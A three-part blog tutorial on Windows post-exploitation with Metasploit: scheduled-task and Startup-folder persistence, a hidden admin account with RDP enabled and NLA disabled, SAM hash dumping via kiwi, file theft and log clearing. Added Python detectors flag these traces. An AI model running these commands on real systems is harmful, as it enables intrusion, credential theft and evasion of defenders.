Creating a Cyber Attack – Part 8 (Post Exploitation – Gaining Persistence 2)

In the final video of this series we continue with post exploitation using Metasploit and Meterpreter, this time using Windows commands to gain persistence.

We have created our new user and have remote desktop access. Now we make sure our backdoor is always running, so that even if it crashes or loses its connection we have ways to restart it without having to interact with the victim machine.

We will then show you a post-exploitation module from Metasploit which you can run against a machine you already have access to. It tests the victim for further vulnerabilities which you can use to dig deeper into the machine and possibly pivot around the network.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps to this point are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Windows commands used in this video are;

  • SCHTASKS /CREATE /TN BACKDOOR /SC HOURLY /ST 10:00 /F /RL HIGHEST /SD 22/12/2020 /ED 22/12/2030 /tr "C:\BACKDOOR.exe" /RU testadmin-pc\backdoor /RP £@55w.rd
  • xcopy BACKDOOR.exe "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

The metasploit commands are;

  • background
  • use post/multi/recon/local_exploit_suggester
  • sessions
  • set session
  • run

We are going to create a new task that runs hourly and launches our malicious exe, which in this demo is stored in the root of the C drive.

In our command we provide a valid username and password (if you are following along from the previous video this would be our “secretuser” account and the password you specified). We also provide a task name, a start and end date, a schedule, the location of the exe, and the credentials it should run under.

We can see our new task created successfully below. This means that if we lose connection, as long as the PC is in use this task will run every hour and provide us with a connection.

Now we want to look at the user’s Startup folder and add our BACKDOOR.exe to it, so every time the user logs in our exe will run and provide us with a connection.

Our exe is currently stored in the user’s Documents folder, which is where our prompt is running from, so we just need to specify where the file is and where we want to copy it to using the xcopy command.

Success. Now our exe will run whenever the user logs in.
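From the defender’s side, both persistence steps above leave an artefact you can check for: a task definition (exported with `schtasks /Query /XML`, and also embedded in Security event 4698) and a file dropped in a Startup folder. The following is an added example, not code from the post: it scores a task definition against what the SCHTASKS line above produces, using a constructed sample rather than captured output.

```python
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (`schtasks /Query /XML` output, also embedded in Security event 4698).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Where properly installed tasks normally launch from; C:\ root or a user profile is worth a look.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"

# Constructed sample mirroring the SCHTASKS line in the post (not captured output).
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1H</Interval></Repetition>
      <StartBoundary>2020-12-22T10:00:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>testadmin-pc\backdoor</UserId>
      <LogonType>Password</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>"C:\BACKDOOR.exe"</Command></Exec>
  </Actions>
</Task>"""

def assess_task(task_xml):
    """Return the reasons a task definition deserves review (empty list = nothing odd)."""
    root = ET.fromstring(task_xml)
    text = lambda path: root.findtext(path, default="", namespaces=NS)
    reasons = []
    for exec_node in root.findall(".//t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).strip().strip('"').lower()
        if not cmd.startswith(TRUSTED_PREFIXES):
            reasons.append(f"runs from an unusual path: {cmd}")
    if text(".//t:RunLevel") == "HighestAvailable":
        reasons.append("requests highest available privileges")
    if text(".//t:Repetition/t:Interval"):
        reasons.append(f"repeats every {text('.//t:Repetition/t:Interval')}")
    # LogonType Password means stored credentials (/RU /RP): the task fires with nobody logged on.
    if text(".//t:LogonType") == "Password":
        reasons.append("runs with stored credentials, independent of a logged-on user")
    return reasons

def is_startup_drop(path):
    """True when a file path lands in a per-user or all-users Startup folder (the xcopy step above)."""
    return STARTUP_MARKER in path.lower()
```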

To run the Metasploit exploit suggester we need to leave the Windows shell and the meterpreter session before loading the module, so we type exit, and then background our session.

We load the module using use post/multi/recon/local_exploit_suggester, then run show options.

We need the session number, so we use the sessions command to find the session we want, then use set session to add it (in our case 12).

Once this is configured we can run the module. It takes a while to complete, but if it finds anything it lists the candidates as below. You can then investigate each one without having to be connected to the victim machine.

Finally we show our meterpreter connection dropping when the victim machine restarts, and then a new connection being created once the user logs back in.

We restart our listener using exploit/multi/handler.

We see our new session (13) connect as expected.

Congratulations if you have followed this series through. You should now have a much better idea of what you are up against. This has been a beginners look at a Cyber Attack from start to finish, but we will look at more complicated and in depth aspects of Cyber Security in the future. Thanks for joining us on this journey.

Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence)

In this video we continue with post exploitation using metasploit and meterpreter, but this time using Windows commands to gain persistence. We start with our meterpreter shell, then use the Windows cmd prompt to run native commands to enumerate shares and users. We will also enable RDP, and create a new user adding the account to the required groups allowing remote access using reduced authentication controls.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

Don’t forget, for an attacker information is key. The more they know, the better equipped they are to find a chink in the security of the defender’s network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup "Administrators" secretuser /add
  • net localgroup "Remote Desktop Users" secretuser /add
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Let’s jump in.

We start from our meterpreter prompt and launch our Windows prompt using shell.

Used without parameters, net share displays information about all of the resources that are shared on the local computer. We see 3 shared locations, including the “Network Share”. This would be a good place to start any file searches for “passwords”, “payment” etc.

Used without parameters, net user displays all of the user accounts on the local computer. We can see the six available on the victim currently, however this will soon be seven.

Let’s create a new user named “secretuser” with the password “£@55w.rd”. In the real world this account would be named to blend in with the other accounts: it would follow your naming standards so that it does not stand out.

The command completes successfully and on the victim machine we can see the new account. Now a standard user account is not much use to us at this point so we want to add it to some groups which will allow us remote access and higher permissions. In this case we add it to the “Administrators” and the “Remote Desktop Users” groups.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands: the first (UserAuthentication) disables Network Level Authentication, the second sets the firewall rule and the third (fDenyTSConnections) enables RDP itself.

  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

All complete successfully (however we do get one message that the netsh firewall command is deprecated, so I need to update myself on the new commands), so let’s test our connection.

And test our new login account.

We manage to log in successfully (at the second attempt lol), but we would not want to kick off another user as this would raise suspicions, so we just close the connection for now.
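The two registry values changed above are exactly what a defender should audit: fDenyTSConnections at 0 means RDP is reachable, and UserAuthentication at 0 means a client gets a full logon screen before presenting any credentials. The following is an added example, not code from the post: it parses `reg query` output (a constructed sample here) for those values and reports where they differ from the hardened setting.

```python
# Value name -> (hardened value, what the weak value means). Paths below use the real key
# names: "...\Control\Terminal Server" and "...\Terminal Server\WinStations\RDP-Tcp".
BASELINE = {
    "fDenyTSConnections": (1, "Remote Desktop connections are allowed (set to 1 unless RDP is needed)"),
    "UserAuthentication": (1, "Network Level Authentication is off; credentials are checked only after a full session is set up"),
}

# Constructed `reg query` output as it would look after the three commands in the post (not captured).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
"""

def parse_reg_query(output):
    """Map value names to data from `reg query` text (lines of NAME  REG_TYPE  DATA)."""
    values = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1].startswith("REG_"):
            name, reg_type, data = parts
            if reg_type == "REG_DWORD":
                # reg query prints DWORDs as hex (0x0, 0x1, ...).
                data = int(data, 16) if data.lower().startswith("0x") else int(data)
            values[name] = data
    return values

def audit_rdp(output):
    """Return findings where the host differs from BASELINE, plus a combined finding when both are weak."""
    values = parse_reg_query(output)
    findings = []
    for name, (hardened, meaning) in BASELINE.items():
        actual = values.get(name)
        if actual is None:
            findings.append(f"{name}: not present, cannot assess")
        elif actual != hardened:
            findings.append(f"{name}={actual}: {meaning} (hardened value {hardened})")
    if values.get("fDenyTSConnections") == 0 and values.get("UserAuthentication") == 0:
        findings.append("RDP is reachable without NLA: the logon screen is exposed to every client that can reach port 3389")
    return findings
```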

In the next post we continue with the last video in this series.

Creating a Cyber Attack – Part 6 (Post Exploitation – With Msf console)

In this video we continue with post exploitation, this time using metasploit and meterpreter. We have socially engineered the victim to visit our malicious webpage which has provided us with an initial connection to our victim machine, and our meterpreter shell. Now we will show a few simple commands you can use to escalate your permission level, clear logs and gather info post exploit.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  1. getuid – shows who we are currently running as on the victim server.
  2. sysinfo – gets the details about the victim computer such as OS and name.
  3. screenshot – grabs a screenshot of the meterpreter desktop.
  4. download – downloads a selected file.
  5. upload – uploads a selected file.
  6. getsystem – uses 15 built-in methods to gain sysadmin privileges.
  7. load kiwi – mimikatz (if you don’t know what this is go have a look online) has been ported into Metasploit and when you load the extension you can use it straight from the meterpreter session.
  8. lsa_dump_sam – dumps the sam database file on screen. (uses Kiwi).
  9. ps – lists running processes on the victim machine.
  10. shell – opens a command shell on the victim machine.
  11. clearev – clears the event logs on the victim’s computer.

We are on our victim machine using our Meterpreter shell, and first off we want some basic information from the machine such as the user account and OS.

Using the getuid command we can see we are running as administrator on testadmin-pc.

Using the sysinfo command shows us a bit more about the host; for example that it is a 32-bit version of Windows 7 running service pack 1.

Next we take a screenshot of the desktop just out of curiosity. You never know what you might grab by chance.

Next we use the download command to steal a file named “Passwords.txt”. (Obviously in real life you will need to list and browse the victim file system looking for files of interest, but we have skipped that part in this video as it would be boring just watching me browse through directories lol!)

Note the double back slashes.

Here we can see the file saved to our root directory after being downloaded from the victim’s machine.

We can also upload files if we wish. If we want to install a more persistent backdoor (even something like TeamViewer) we can get our installer onto the target.

BACKDOOR.exe is the file we want to upload. Again note the double back slashes below.

Above we can see the file on the victim’s machine. (You would obviously upload to somewhere less conspicuous.)

Currently we are running as administrator which is really great, but if we want to access all other user credentials on the victim machine we need to be running as system. Let’s try and elevate our privileges using the getsystem command.

Success!

Now let’s load kiwi and try to dump the SAM file. First we load kiwi.

Then we run lsa_dump_sam.

Success! It returns 6 account names and their password hashes. (If you don’t know what to do with password hashes check out our guide on how to crack them). https://blog.2code-monte.co.uk/2020/08/02/cracking-password-hashes-hacking-rdp-servers-part-3/

If we want to look at running processes we simply use ps.

Below we have highlighted our malicious process running on the victim which is our meterpreter shell.

If we want to open a Windows cmd prompt and interact with the victim machine using Windows commands we use shell.

Here we just open the Windows calculator to demo, but there is much more you can do, which we will cover in future guides.

All of this activity leaves a trace, and we don’t want anyone knowing what we have been up to, so before we go we want to delete the logs from the system. For this we have the clearev command.

We open up Event Viewer on the victim so you can see the log full initially, then empty after the command has completed.

Clearing the log is itself evidence that something has happened on the machine, but the defenders will not have the specific events that could point them in the right direction, and some will never check the event logs anyway, so they won’t even notice.
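The steps in Part 7 (net user /add, net localgroup /add) and the clearev step here each write a Security event that survives if logs are forwarded off the host: 4720 for the new account, 4732 for the group membership change, and 1102 for the log being cleared. The following is an added example, not code from the posts: a small detector run over constructed Security events that raises the alerts a defender would want for that sequence.

```python
# Constructed Security-log events for the activity in Parts 6 and 7 (not captured from a real host).
# Real 4732 events carry the member as a SID; here the name is shown resolved for readability.
EVENTS = [
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 2},
    {"EventID": 4720, "SubjectUserName": "Administrator", "TargetUserName": "secretuser"},
    {"EventID": 4732, "SubjectUserName": "Administrator", "TargetUserName": "Administrators", "MemberName": "secretuser"},
    {"EventID": 4732, "SubjectUserName": "Administrator", "TargetUserName": "Remote Desktop Users", "MemberName": "secretuser"},
    {"EventID": 4732, "SubjectUserName": "Administrator", "TargetUserName": "Users", "MemberName": "secretuser"},
    {"EventID": 1102, "SubjectUserName": "Administrator"},
]

# Local groups whose membership changes should always be alerted on.
SENSITIVE_GROUPS = {"administrators", "remote desktop users"}

def detect(events):
    """Walk events in order and return alert strings for the account, group and log-clearing steps."""
    alerts = []
    created = set()  # accounts created earlier in this batch
    for ev in events:
        eid = ev["EventID"]
        if eid == 4720:
            created.add(ev["TargetUserName"].lower())
            alerts.append(f"4720: local account '{ev['TargetUserName']}' created by {ev['SubjectUserName']}")
        elif eid == 4732 and ev["TargetUserName"].lower() in SENSITIVE_GROUPS:
            # A brand-new account landing straight in Administrators or Remote Desktop Users is the Part 7 pattern.
            note = " (account created earlier in this batch)" if ev["MemberName"].lower() in created else ""
            alerts.append(f"4732: '{ev['MemberName']}' added to {ev['TargetUserName']}{note}")
        elif eid == 1102:
            # Clearing the Security log writes 1102 as its first new record, so the wipe itself is visible.
            alerts.append(f"1102: Security log cleared by {ev['SubjectUserName']} after {len(alerts)} earlier alerts in this batch")
    return alerts
```

Only events already shipped to a collector survive clearev, so the value of the detector depends on forwarding the Security log rather than reading it on the endpoint.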

Hope you got something out of this, and that it has helped you be more aware of what can happen on a system. There will be one more post exploitation video, and then we will start to look at how to detect and spot this activity on your endpoints.